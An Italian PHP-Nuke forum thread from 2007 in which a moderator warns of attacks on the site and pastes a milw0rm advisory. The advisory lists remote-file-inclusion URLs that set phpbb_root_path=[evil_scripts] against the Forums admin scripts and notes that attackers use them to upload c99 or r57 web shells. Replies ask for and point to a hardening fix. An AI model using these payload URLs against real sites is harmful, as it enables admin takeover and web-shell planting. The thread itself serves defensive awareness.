. ::  Rilasciato Content Plus 2.2.1  ::  Nuke Debuggeer  ::  Backup_Restore Utility  ::  AV Home Articles V.1.0  ::  Modulo Video 2.0 ::.
Benvenuto su PHP-Nukefordonkeys.com Donkeys76 Mercatino 1200Temi Manuale
 
Benvenuto su PHP-Nukefordonkeys.com

  Iscriviti! E' Gratis!                                                                                                   
La Tua WebAgency


Menu Generale
Home
News
Mappa del Sito
Recensioni
Trova Tutto
Utenti
Forums
Downloads
Contatti
Promo Tuo Sito
Tutorials
Speciali
Manuali
PHPNuke Tools
Utility
Gallerie
Nuke Shopping
Documenti

Recensioni Siti
· MemHT Portal
· Web Agency
· Calcio
· Dieta
· Giochi
· Gossip - SMS
· Investimenti
· Ricette cucina

**************
·casino online
·Sfrutta meglio il web
·Guida casino online
·Prestito auto

Consigliati



PHP-Nukefordonkeys.com: Forums

Phpnukefordonkeys.com :: Leggi il Topic - Nuovo Exploit per tutte le versioni Nuke
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

Nuovo Exploit per tutte le versioni Nuke

 
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza PHP-Nuke
Precedente :: Successivo  
Autore Messaggio
_-PaKi-_
Moderatore
Moderatore


Registrato: May 16, 2005
Messaggi: 389
Localitā: Milano
MessaggioInviato: 07-05-2007 18:58    Oggetto: Nuovo Exploit per tutte le versioni Nuke Rispondi citando
Attenzione

Qui di seguito inserisco il nuovissimo exploits per tutte le versioni phpnuke, propio con questo exploit stanno cercando di attaccare il nostro portale PhpNuke Island, tale exploit non fa altro che cercare un accesso dal lato Forums del nostro phpnuke

Codice:
# Milli-Harekat Advisory ( www.milli-harekat.org )
# PHP-Nuke <= All version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHP NUKE ALL VERSION
# Credits : ERNE
# Thanks : Dj_ReMix,Eskobar,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
# Vulnerable :

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]

# milw0rm.com [2006-06-02]


Quelle sono le directory ed i files sotto rischio, pertanto noi dello staff Island consigliamo di mettere al sicuro il forum onde evitare brutte sorprese... infatti l'exploit non fa altro che uppare una shell tipo la c99 o la r57, questo se digitando gli indirizzi nella lista apre le pagine interessate, che non sono protette da nessuna autorizzazione.

Questo permette a male intenzionati di poter accedere alla sezione amministrazione e prendere il controllo del Forum.


Torna in cima
Profilo Messaggio privato Invia email HomePage
Giovannib
Newbie
Newbie


Registrato: Sep 15, 2006
Messaggi: 338
MessaggioInviato: 07-05-2007 19:11    Oggetto: Rispondi citando
E la soluzione??

Torna in cima
Profilo Messaggio privato Invia email
rc1351
Newbie
Newbie


Registrato: Jun 24, 2006
Messaggi: 175
MessaggioInviato: 07-05-2007 19:20    Oggetto: Rispondi citando
penso sia applicabile quella indicata da Robco per il file admin_board - exploit vecchio che ogni tanto rilanciano
Torna in cima
Profilo Messaggio privato
rino
Amministratore
Amministratore


Registrato: Sep 28, 2004
Messaggi: 4617
Localitā: Anzio
MessaggioInviato: 07-05-2007 19:34    Oggetto: Rispondi citando
In Area Riservata 1 c'č anche il tutorial
Migliorare la sicurezza del forum phpBB - Sconfiggere i lamers in 6 rounds!

Torna in cima
Profilo Messaggio privato Invia email HomePage
_-PaKi-_
Moderatore
Moderatore


Registrato: May 16, 2005
Messaggi: 389
Localitā: Milano
MessaggioInviato: 07-05-2007 19:45    Oggetto: Rispondi citando
rc1351 ha scritto:
penso sia applicabile quella indicata da Robco per il file admin_board - exploit vecchio che ogni tanto rilanciano


Questo non potrei dirlo con certezza perchč non conosco il rimedio di robco di certo so che la soluzione scritta da rino nel tutorial č un ottima soluzione Wink


Torna in cima
Profilo Messaggio privato Invia email HomePage
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Sicurezza PHP-Nuke Tutti i fusi orari sono GMT + 2 ore
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum



Powered by phpBB © 2001 - 2007 phpBB Group
Forums ©


Rent Games - Cheap Gas - Loan - Credit Cards
Siti consigliati: Weblord - Tiempolibresite - jugo- pcprimipassi - aliek - tweakness - Script e Manuali - net-free - Manuali - HardwareMax - Web Promotion - Directory - Tuttosoft.it - GBComputer - Computerxtreme
Network: PHP Nuke Maximus - 1 Million Free Games - 1 Million Nuke Pixel - Corvoingordo - Ingegneria Gestionale - Torre del Greco

Generazione pagina: 0.49 Secondi